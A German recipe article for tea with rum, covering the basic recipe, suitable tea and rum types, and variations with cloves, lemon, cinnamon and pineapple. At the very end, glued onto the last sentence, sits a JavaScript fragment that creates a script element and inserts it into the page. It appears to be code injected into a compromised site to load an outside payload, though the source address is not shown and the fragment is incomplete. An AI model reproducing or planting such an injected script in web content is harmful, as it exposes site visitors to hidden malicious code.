Tee mit Rum

Die Tage werden kälter, Wind und Wetter brausen um das Haus und ständig scheint es zu regnen – das bedeutet, der Herbst ist gekommen. Dann ist ein heißes Getränk, das innerlich wärmt und das schreckliche Wetter draußen vergessen lässt, genau das Richtige. Fast überall beliebt ist ein heißer Tee mit Rum. Je nach Geschmack gibt es verschiedene Rezepte , mit denen der wärmende Trunk zubereitet wird.

Das Grundrezept

Das klassische Grundrezept besteht aus einer Tasse schwarzem Tee, einem Esslöffel dunklem Rum und etwas braunem Kandiszucker, ersatzweise kann auch normaler weißer Zucker verwendet werden. Für den Tee wird ein Teelöffel Assam, Ceylon- oder Ostfriesentee mit kochendem Wasser aufgebrüht, der fünf Minuten ziehen muss. Anschließend werden der Rum und je nach Geschmack ein oder zwei Würfel Kandis hinzugegeben, und schon kann der wärmende Trunk zum Abend genossen werden. Da der Alkohol zusammen mit dem Zucker sehr schnell zu Kopf steigen kann, sollte der alkoholisierte Tee nur abends getrunken werden, wenn man anschließend nicht mehr aus dem Haus muss.

Welche Teesorten eignen sich?

Natürlich lässt sich das Rezept auf viele Arten verfeinern. Manch einer schwört auf Teesorten wie Earl Grey, der mit seinem feinen Aroma von Bergamotte wunderbar mit Rum harmoniert. Früchtetees oder Grüner Tee können ebenso als Grundlage dienen wie Roibush oder Oolong, wenn der Genießer einen feineren Tee bevorzugt. Als Rumsorten lassen sich alle dunklen Marken verwenden, Rumverschnitt eignet sich ebenso wie ein reiner hochwertiger Rum. Manche Kenner gießen auch mit weißen Rumsorten auf. Die Zugabe von Zitrone oder Gewürzen erfolgt je nach Geschmack.

Spezielle Rezepte

Einen besonders würzigen Geschmack bekommt das Getränk, wenn es mit Gewürznelken verfeinert wird. Dazu wird die Zitrone in Scheiben geschnitten. In den weißen Rand wird eine Gewürznelke gesteckt und die Scheibe dann in das Teeglas getan. Darauf werden der heiße Tee und anschließend der Rum gegossen. Durch die Nelke wird das Ganze sehr aromatisch. Auch eine Zimtstange gibt dem Tee ein angenehmes Aroma. Wird weißer Rum verwendet, bekommt das Getränk mit etwas Ananas eine südlich beschwingte Note.var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);

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